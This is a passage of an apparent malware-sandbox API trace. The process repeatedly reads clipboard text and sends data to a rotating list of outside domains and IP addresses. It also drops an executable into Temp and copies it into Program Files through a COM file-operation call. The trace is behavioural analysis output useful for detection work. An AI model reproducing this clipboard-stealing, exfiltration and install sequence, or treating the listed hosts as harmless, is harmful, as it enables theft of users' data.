returned 0x21e4 [0159.856] connect (s=0x21e4, name=0x4b49f00*(sa_family=2, sin_port=0x50, sin_addr="81.169.145.157"), namelen=16) returned 0 [0159.877] send (s=0x21e4, buf=0xb0dd322*, len=177, flags=0) returned 177 [0159.877] setsockopt (s=0x21e4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0159.877] recv (in: s=0x21e4, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 374 [0159.923] closesocket (s=0x21e4) returned 0 [0159.923] Sleep (dwMilliseconds=0x1388) [0159.959] OpenClipboard (hWndNewOwner=0x0) returned 1 [0159.959] GetClipboardData (uFormat=0xd) returned 0x4a20e10 [0159.959] GlobalLock (hMem=0x4a20e10) returned 0x4a20e10 [0159.959] GlobalUnlock (hMem=0x4a20e10) returned 1 [0159.959] CloseClipboard () returned 1 [0159.960] socket (af=2, type=1, protocol=6) returned 0x21d4 [0159.960] getaddrinfo (in: pNodeName="www.baila.madrid", pServiceName="80", pHints=0x4b14698*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b146c8 | out: ppResult=0x4b146c8*=0x4d59b40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b49e60*(sa_family=2, sin_port=0x50, sin_addr="31.214.178.54"), ai_next=0x0)) returned 0 [0159.962] connect (s=0x21d4, name=0x4b49e60*(sa_family=2, sin_port=0x50, sin_addr="31.214.178.54"), namelen=16) returned 0 [0160.018] RtlIntegerToChar (in: Value=0x285, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="645") returned 0x0 [0160.018] send (s=0x21d4, buf=0xb0bff22*, len=1040, flags=0) returned 1040 [0160.019] closesocket (s=0x21d4) returned 0 [0160.019] socket (af=2, type=1, protocol=6) returned 0x21d4 [0160.019] connect (s=0x21d4, name=0x4b49e60*(sa_family=2, sin_port=0x50, sin_addr="31.214.178.54"), namelen=16) returned 0 [0160.081] send (s=0x21d4, buf=0xb0dd322*, len=172, flags=0) returned 172 [0160.082] setsockopt (s=0x21d4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0160.082] recv (in: s=0x21d4, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 3970 [0160.177] closesocket (s=0x21d4) returned 0 [0160.177] Sleep (dwMilliseconds=0x1388) [0160.179] OpenClipboard (hWndNewOwner=0x0) returned 1 [0160.179] GetClipboardData (uFormat=0xd) returned 0x4a20910 [0160.179] GlobalLock (hMem=0x4a20910) returned 0x4a20910 [0160.179] GlobalUnlock (hMem=0x4a20910) returned 1 [0160.179] CloseClipboard () returned 1 [0160.179] socket (af=2, type=1, protocol=6) returned 0x21d4 [0160.179] getaddrinfo (in: pNodeName="www.1kingbet.com", pServiceName="80", pHints=0x4b14a38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b14a68 | out: ppResult=0x4b14a68*=0x5e35a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b49b20*(sa_family=2, sin_port=0x50, sin_addr="104.21.39.50"), ai_next=0x5e34a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4a100*(sa_family=2, sin_port=0x50, sin_addr="172.67.143.57"), ai_next=0x0))) returned 0 [0160.329] connect (s=0x21d4, name=0x4b49b20*(sa_family=2, sin_port=0x50, sin_addr="104.21.39.50"), namelen=16) returned 0 [0160.350] RtlIntegerToChar (in: Value=0x285, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="645") returned 0x0 [0160.350] send (s=0x21d4, buf=0xb0bff22*, len=1040, flags=0) returned 1040 [0160.351] closesocket (s=0x21d4) returned 0 [0160.351] socket (af=2, type=1, protocol=6) returned 0x21d4 [0160.351] connect (s=0x21d4, name=0x4b49b20*(sa_family=2, sin_port=0x50, sin_addr="104.21.39.50"), namelen=16) returned 0 [0160.372] send (s=0x21d4, buf=0xb0dd322*, len=172, flags=0) returned 172 [0160.373] setsockopt (s=0x21d4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0160.373] recv (in: s=0x21d4, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 806 [0160.435] closesocket (s=0x21d4) returned 0 [0160.436] Sleep (dwMilliseconds=0x1388) [0160.438] OpenClipboard (hWndNewOwner=0x0) returned 1 [0160.438] GetClipboardData (uFormat=0xd) returned 0x4a20b40 [0160.438] GlobalLock (hMem=0x4a20b40) returned 0x4a20b40 [0160.438] GlobalUnlock (hMem=0x4a20b40) returned 1 [0160.438] CloseClipboard () returned 1 [0160.438] socket (af=2, type=1, protocol=6) returned 0x21d4 [0160.438] getaddrinfo (in: pNodeName="www.shahjahantravel.com", pServiceName="80", pHints=0x4b14dd8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b14e08 | out: ppResult=0x4b14e08*=0x5e36a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4a0a0*(sa_family=2, sin_port=0x50, sin_addr="104.219.248.101"), ai_next=0x0)) returned 0 [0160.443] connect (s=0x21d4, name=0x4b4a0a0*(sa_family=2, sin_port=0x50, sin_addr="104.219.248.101"), namelen=16) returned 0 [0160.648] RtlIntegerToChar (in: Value=0x285, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="645") returned 0x0 [0160.648] send (s=0x21d4, buf=0xb0bff22*, len=1061, flags=0) returned 1061 [0160.649] closesocket (s=0x21d4) returned 0 [0160.650] socket (af=2, type=1, protocol=6) returned 0x21d4 [0160.650] connect (s=0x21d4, name=0x4b4a0a0*(sa_family=2, sin_port=0x50, sin_addr="104.219.248.101"), namelen=16) returned 0 [0160.831] send (s=0x21d4, buf=0xb0dd322*, len=179, flags=0) returned 179 [0160.832] setsockopt (s=0x21d4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0160.832] recv (in: s=0x21d4, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 1073 [0161.050] closesocket (s=0x21d4) returned 0 [0161.050] Sleep (dwMilliseconds=0x1388) [0161.060] OpenClipboard (hWndNewOwner=0x0) returned 1 [0161.060] GetClipboardData (uFormat=0xd) returned 0x4a20dc0 [0161.061] GlobalLock (hMem=0x4a20dc0) returned 0x4a20dc0 [0161.061] GlobalUnlock (hMem=0x4a20dc0) returned 1 [0161.061] CloseClipboard () returned 1 [0161.061] socket (af=2, type=1, protocol=6) returned 0x21d4 [0161.062] connect (s=0x21d4, name=0x4b4d880*(sa_family=2, sin_port=0x50, sin_addr="99.86.186.56"), namelen=16) returned 0 [0161.160] RtlIntegerToChar (in: Value=0x285, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="645") returned 0x0 [0161.160] send (s=0x21d4, buf=0xb0bff22*, len=1037, flags=0) returned 1037 [0161.161] closesocket (s=0x21d4) returned 0 [0161.161] socket (af=2, type=1, protocol=6) returned 0x21d4 [0161.162] connect (s=0x21d4, name=0x4b4d880*(sa_family=2, sin_port=0x50, sin_addr="99.86.186.56"), namelen=16) returned 0 [0161.262] send (s=0x21d4, buf=0xb0dd322*, len=167, flags=0) returned 167 [0161.262] setsockopt (s=0x21d4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0161.262] recv (in: s=0x21d4, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 676 [0161.385] closesocket (s=0x21d4) returned 0 [0161.385] Sleep (dwMilliseconds=0x1388) [0161.387] OpenClipboard (hWndNewOwner=0x0) returned 1 [0161.387] GetClipboardData (uFormat=0xd) returned 0x4a20b40 [0161.387] GlobalLock (hMem=0x4a20b40) returned 0x4a20b40 [0161.387] GlobalUnlock (hMem=0x4a20b40) returned 1 [0161.387] CloseClipboard () returned 1 [0161.387] socket (af=2, type=1, protocol=6) returned 0x21d4 [0161.387] connect (s=0x21d4, name=0x4b4d620*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0161.409] RtlIntegerToChar (in: Value=0x285, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="645") returned 0x0 [0161.409] send (s=0x21d4, buf=0xb0bff22*, len=1055, flags=0) returned 1055 [0161.411] closesocket (s=0x21d4) returned 0 [0161.412] socket (af=2, type=1, protocol=6) returned 0x21d4 [0161.412] connect (s=0x21d4, name=0x4b4d620*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0161.438] send (s=0x21d4, buf=0xb0dd322*, len=173, flags=0) returned 173 [0161.438] setsockopt (s=0x21d4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0161.439] recv (in: s=0x21d4, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 461 [0161.584] closesocket (s=0x21d4) returned 0 [0161.585] Sleep (dwMilliseconds=0x1388) [0161.586] OpenClipboard (hWndNewOwner=0x0) returned 1 [0161.586] GetClipboardData (uFormat=0xd) returned 0x4a20b40 [0161.587] GlobalLock (hMem=0x4a20b40) returned 0x4a20b40 [0161.587] GlobalUnlock (hMem=0x4a20b40) returned 1 [0161.587] CloseClipboard () returned 1 [0161.587] socket (af=2, type=1, protocol=6) returned 0x21d4 [0161.587] connect (s=0x21d4, name=0x4b4d740*(sa_family=2, sin_port=0x50, sin_addr="172.67.189.216"), namelen=16) returned 0 [0161.613] RtlIntegerToChar (in: Value=0x285, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="645") returned 0x0 [0161.613] send (s=0x21d4, buf=0xb0bff22*, len=1043, flags=0) returned 1043 [0161.614] closesocket (s=0x21d4) returned 0 [0161.614] socket (af=2, type=1, protocol=6) returned 0x21d4 [0161.615] connect (s=0x21d4, name=0x4b4d740*(sa_family=2, sin_port=0x50, sin_addr="172.67.189.216"), namelen=16) returned 0 [0161.644] send (s=0x21d4, buf=0xb0dd322*, len=169, flags=0) returned 169 [0161.645] setsockopt (s=0x21d4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0161.645] recv (in: s=0x21d4, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 840 [0161.703] closesocket (s=0x21d4) returned 0 [0161.704] Sleep (dwMilliseconds=0x1388) [0161.705] OpenClipboard (hWndNewOwner=0x0) returned 1 [0161.705] GetClipboardData (uFormat=0xd) returned 0x4a21680 [0161.705] GlobalLock (hMem=0x4a21680) returned 0x4a21680 [0161.705] GlobalUnlock (hMem=0x4a21680) returned 1 [0161.705] CloseClipboard () returned 1 [0161.705] socket (af=2, type=1, protocol=6) returned 0x21d4 [0161.706] connect (s=0x21d4, name=0x4b4d560*(sa_family=2, sin_port=0x50, sin_addr="31.214.178.54"), namelen=16) returned 0 [0161.769] RtlIntegerToChar (in: Value=0x285, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="645") returned 0x0 [0161.769] send (s=0x21d4, buf=0xb0bff22*, len=1040, flags=0) returned 1040 [0161.770] closesocket (s=0x21d4) returned 0 [0161.771] socket (af=2, type=1, protocol=6) returned 0x21d4 [0161.771] connect (s=0x21d4, name=0x4b4d560*(sa_family=2, sin_port=0x50, sin_addr="31.214.178.54"), namelen=16) returned 0 [0161.889] send (s=0x21d4, buf=0xb0dd322*, len=168, flags=0) returned 168 [0161.889] setsockopt (s=0x21d4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0161.890] recv (in: s=0x21d4, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 3970 [0161.988] closesocket (s=0x21d4) returned 0 [0161.989] Sleep (dwMilliseconds=0x1388) [0161.991] OpenClipboard (hWndNewOwner=0x0) returned 1 [0161.991] GetClipboardData (uFormat=0xd) returned 0x4a20b40 [0161.992] GlobalLock (hMem=0x4a20b40) returned 0x4a20b40 [0161.992] GlobalUnlock (hMem=0x4a20b40) returned 1 [0161.992] CloseClipboard () returned 1 [0161.992] socket (af=2, type=1, protocol=6) returned 0x21d4 [0161.993] getaddrinfo (in: pNodeName="www.rap8b55d.com", pServiceName="80", pHints=0x4b15ff8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b16028 | out: ppResult=0x4b16028*=0x4d56e40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b49ac0*(sa_family=2, sin_port=0x50, sin_addr="198.54.112.103"), ai_next=0x0)) returned 0 [0161.998] connect (s=0x21d4, name=0x4b49ac0*(sa_family=2, sin_port=0x50, sin_addr="198.54.112.103"), namelen=16) returned 0 [0162.167] RtlIntegerToChar (in: Value=0x285, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="645") returned 0x0 [0162.168] send (s=0x21d4, buf=0xb0bff22*, len=1040, flags=0) returned 1040 [0162.168] Sleep (dwMilliseconds=0x7d0) [0162.170] closesocket (s=0x21d4) returned 0 [0162.170] socket (af=2, type=1, protocol=6) returned 0x21d4 [0162.171] connect (s=0x21d4, name=0x4b49ac0*(sa_family=2, sin_port=0x50, sin_addr="198.54.112.103"), namelen=16) returned 0 [0162.344] send (s=0x21d4, buf=0xb0dd322*, len=168, flags=0) returned 168 [0162.346] Sleep (dwMilliseconds=0x7d0) [0162.348] setsockopt (s=0x21d4, level=65535, optname=4102, optval="¸\x0b", optlen=4) returned 0 [0162.348] recv (in: s=0x21d4, buf=0x106eb56c, len=2048000, flags=0 | out: buf=0x106eb56c*) returned 458 [0163.210] recv (in: s=0x21d4, buf=0x106eb736, len=2047542, flags=0 | out: buf=0x106eb736) returned 0 [0163.211] closesocket (s=0x21d4) returned 0 [0163.536] Sleep (dwMilliseconds=0x1388) [0163.619] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.625] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0xffffffffffffffff, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.648] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0163.648] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64c00) returned 1 [0163.648] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Ealwtgnkh" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ealwtgnkh"), lpSecurityAttributes=0x0) returned 1 [0163.652] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bf910, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.652] NtCreateFile (in: FileHandle=0x122bf8b0, DesiredAccess=0x12019f, ObjectAttributes=0x122bf920*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bf8c0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bf8b0*=0x21d4, IoStatusBlock=0x122bf8c0*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0163.653] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bf830 | out: HeapArray=0x122bf830*=0x570000) returned 0x5 [0163.653] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xf8e0560) returned 1 [0163.658] NtQueryInformationFile (in: FileHandle=0x21d4, IoStatusBlock=0x122bf8c0, FileInformation=0x122bf8d0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bf8c0, FileInformation=0x122bf8d0) returned 0x0 [0163.664] NtWriteFile (in: FileHandle=0x21d4, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x122bf8c0, Buffer=0x108e796c*, Length=0x41365, ByteOffset=0x122bf8b8*=0, Key=0x0 | out: IoStatusBlock=0x122bf8c0, Buffer=0x108e796c*) returned 0x0 [0163.677] NtClose (Handle=0x21d4) returned 0x0 [0163.802] CoInitializeEx (pvReserved=0x0, dwCoInit=0x6) returned 0x0 [0163.803] CoCreateInstance (in: rclsid=0xb0b3ae6*(Data1=0x3ad05575, Data2=0x8857, Data3=0x4850, Data4=([0]=0x92, [1]=0x77, [2]=0x11, [3]=0xb8, [4]=0x5b, [5]=0xdb, [6]=0x8e, [7]=0x9)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xb0b3af6*(Data1=0x947aab5f, Data2=0xa5c, Data3=0x4c13, Data4=([0]=0xb4, [1]=0xd6, [2]=0x4b, [3]=0xf7, [4]=0x83, [5]=0x6f, [6]=0xc9, [7]=0xf8)), ppv=0x122bfe10 | out: ppv=0x122bfe10*=0x4a23430) returned 0x0 [0163.804] FileOperation:IFileOperation:SetOperationFlags (This=0x4a23430, dwOperationFlags=0x10840414) returned 0x0 [0163.804] SHCreateItemFromParsingName (in: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Ealwtgnkh", pbc=0x0, riid=0xb0b3ad6*(Data1=0x43826d1e, Data2=0xe718, Data3=0x42ee, Data4=([0]=0xbc, [1]=0x55, [2]=0xa1, [3]=0xe2, [4]=0x61, [5]=0xc3, [6]=0x7b, [7]=0xfe)), ppv=0x122bfe28 | out: ppv=0x122bfe28*=0x4c30ab8) returned 0x0 [0163.817] SHCreateItemFromParsingName (in: pszPath="C:\\Program Files (x86)", pbc=0x0, riid=0xb0b3ad6*(Data1=0x43826d1e, Data2=0xe718, Data3=0x42ee, Data4=([0]=0xbc, [1]=0x55, [2]=0xa1, [3]=0xe2, [4]=0x61, [5]=0xc3, [6]=0x7b, [7]=0xfe)), ppv=0x122bfe20 | out: ppv=0x122bfe20*=0x4c32178) returned 0x0 [0163.820] FileOperation:IFileOperation:CopyItem (This=0x4a23430, psiItem=0x4c30ab8, psiDestinationFolder=0x4c32178, pszCopyName="Ealwtgnkh", pfopsItem=0x0) returned 0x0 [0163.820] FileOperation:IFileOperation:PerformOperations (This=0x4a23430) returned 0x0 [0173.270] FileOperation:IUnknown:Release (This=0x4c32178) returned 0x2 [0173.270] FileOperation:IUnknown:Release (This=0x4c30ab8) returned 0x0 [0173.270] FileOperation:IUnknown:Release (This=0x4a23430) returned 0x2 [0173.270] CoUninitialize () [0173.326] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bf910, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.340] NtDeleteFile (ObjectAttributes=0x122bf920*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0)) returned 0x0 [0173.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bf910, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.344] NtCreateFile (in: FileHandle=0x122bf8b0, DesiredAccess=0x120089, ObjectAttributes=0x122bf920*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bf8c0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bf8b0*=0x1f74, IoStatusBlock=0x122bf8c0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0173.344] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bf830 | out: HeapArray=0x122bf830*=0x570000) returned 0x5 [0173.344] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65280) returned 1 [0173.344] NtQueryInformationFile (in: FileHandle=0x1f74, IoStatusBlock=0x122bf8c0, FileInformation=0x122bf8d0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bf8c0, FileInformation=0x122bf8d0) returned 0x0 [0173.344] NtClose (Handle=0x1f74) returned 0x0 [0173.345] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.345] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0xffffffffffffffff, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000043 [0173.345] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0173.345] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65080) returned 1 [0173.364] OpenClipboard (hWndNewOwner=0x0) returned 1 [0173.365] GetClipboardData (uFormat=0xd) returned 0x4b0b450 [0173.365] GlobalLock (hMem=0x4b0b450) returned 0x4b0b450 [0173.365] GetForegroundWindow () returned 0x2007c [0173.365] GetWindowTextW (in: hWnd=0x2007c, lpString=0xb0b72a2, nMaxCount=260 | out: lpString="") returned 0 [0173.386] GlobalUnlock (hMem=0x4b0b450) returned 1 [0173.386] CloseClipboard () returned 1 [0173.386] socket (af=2, type=1, protocol=6) returned 0x1f74 [0173.387] connect (s=0x1f74, name=0x4b4d2c0*(sa_family=2, sin_port=0x50, sin_addr="81.169.145.157"), namelen=16) returned 0 [0173.450] RtlIntegerToChar (in: Value=0xc9d, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="3229") returned 0x0 [0173.450] send (s=0x1f74, buf=0xb0bff22*, len=3644, flags=0) returned 3644 [0173.451] closesocket (s=0x1f74) returned 0 [0173.452] socket (af=2, type=1, protocol=6) returned 0x1f74 [0173.452] connect (s=0x1f74, name=0x4b4d2c0*(sa_family=2, sin_port=0x50, sin_addr="81.169.145.157"), namelen=16) returned 0 [0173.476] RtlIntegerToChar (in: Value=0xf9, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="249") returned 0x0 [0173.476] send (s=0x1f74, buf=0xb0bff22*, len=663, flags=0) returned 663 [0173.476] closesocket (s=0x1f74) returned 0 [0173.477] socket (af=2, type=1, protocol=6) returned 0x1f74 [0173.477] connect (s=0x1f74, name=0x4b4d2c0*(sa_family=2, sin_port=0x50, sin_addr="81.169.145.157"), namelen=16) returned 0 [0173.501] send (s=0x1f74, buf=0xb0dd322*, len=173, flags=0) returned 173 [0173.502] setsockopt (s=0x1f74, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0173.502] recv (in: s=0x1f74, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 374 [0173.544] closesocket (s=0x1f74) returned 0 [0173.545] Sleep (dwMilliseconds=0x1388) [0173.546] OpenClipboard (hWndNewOwner=0x0) returned 1 [0173.546] GetClipboardData (uFormat=0xd) returned 0x4b0acd0 [0173.547] GlobalLock (hMem=0x4b0acd0) returned 0x4b0acd0 [0173.547] GlobalUnlock (hMem=0x4b0acd0) returned 1 [0173.547] CloseClipboard () returned 1 [0173.547] socket (af=2, type=1, protocol=6) returned 0x1f74 [0173.547] connect (s=0x1f74, name=0x4b4d4a0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0173.572] RtlIntegerToChar (in: Value=0xc9d, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="3229") returned 0x0 [0173.572] send (s=0x1f74, buf=0xb0bff22*, len=3647, flags=0) returned 3647 [0173.573] closesocket (s=0x1f74) returned 0 [0173.573] socket (af=2, type=1, protocol=6) returned 0x1f74 [0173.573] connect (s=0x1f74, name=0x4b4d4a0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0173.601] RtlIntegerToChar (in: Value=0xf9, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="249") returned 0x0 [0173.602] send (s=0x1f74, buf=0xb0bff22*, len=666, flags=0) returned 666 [0173.602] closesocket (s=0x1f74) returned 0 [0173.603] socket (af=2, type=1, protocol=6) returned 0x1f74 [0173.603] connect (s=0x1f74, name=0x4b4d4a0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0173.631] send (s=0x1f74, buf=0xb0dd322*, len=174, flags=0) returned 174 [0173.631] setsockopt (s=0x1f74, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0173.632] recv (in: s=0x1f74, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 461 [0173.830] closesocket (s=0x1f74) returned 0 [0173.830] Sleep (dwMilliseconds=0x1388) [0173.832] OpenClipboard (hWndNewOwner=0x0) returned 1 [0173.832] GetClipboardData (uFormat=0xd) returned 0x4b0b720 [0173.832] GlobalLock (hMem=0x4b0b720) returned 0x4b0b720 [0173.832] GlobalUnlock (hMem=0x4b0b720) returned 1 [0173.833] CloseClipboard () returned 1 [0173.842] getaddrinfo (in: pNodeName="www.sec-app.pro", pServiceName="80", pHints=0x4b16ad8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b16b08 | out: ppResult=0x4b16b08*=0x0) returned 11001 [0173.845] getaddrinfo (in: pNodeName="www.sec-app.pro", pServiceName="80", pHints=0x4b16ad8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b16b08 | out: ppResult=0x4b16b08*=0x0) returned 11001 [0173.846] getaddrinfo (in: pNodeName="www.sec-app.pro", pServiceName="80", pHints=0x4b16ad8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b16b08 | out: ppResult=0x4b16b08*=0x0) returned 11001 [0173.847] Sleep (dwMilliseconds=0x1388) [0173.848] Sleep (dwMilliseconds=0x1388) [0173.850] Sleep (dwMilliseconds=0x1388) [0173.852] Sleep (dwMilliseconds=0x1388) [0173.853] Sleep (dwMilliseconds=0x1388) [0173.855] OpenClipboard (hWndNewOwner=0x0) returned 1 [0173.855] GetClipboardData (uFormat=0xd) returned 0x4b0b720 [0173.855] GlobalLock (hMem=0x4b0b720) returned 0x4b0b720 [0173.855] GlobalUnlock (hMem=0x4b0b720) returned 1 [0173.855] CloseClipboard () returned 1 [0173.931] socket (af=2, type=1, protocol=6) returned 0x1f74 [0173.932] getaddrinfo (in: 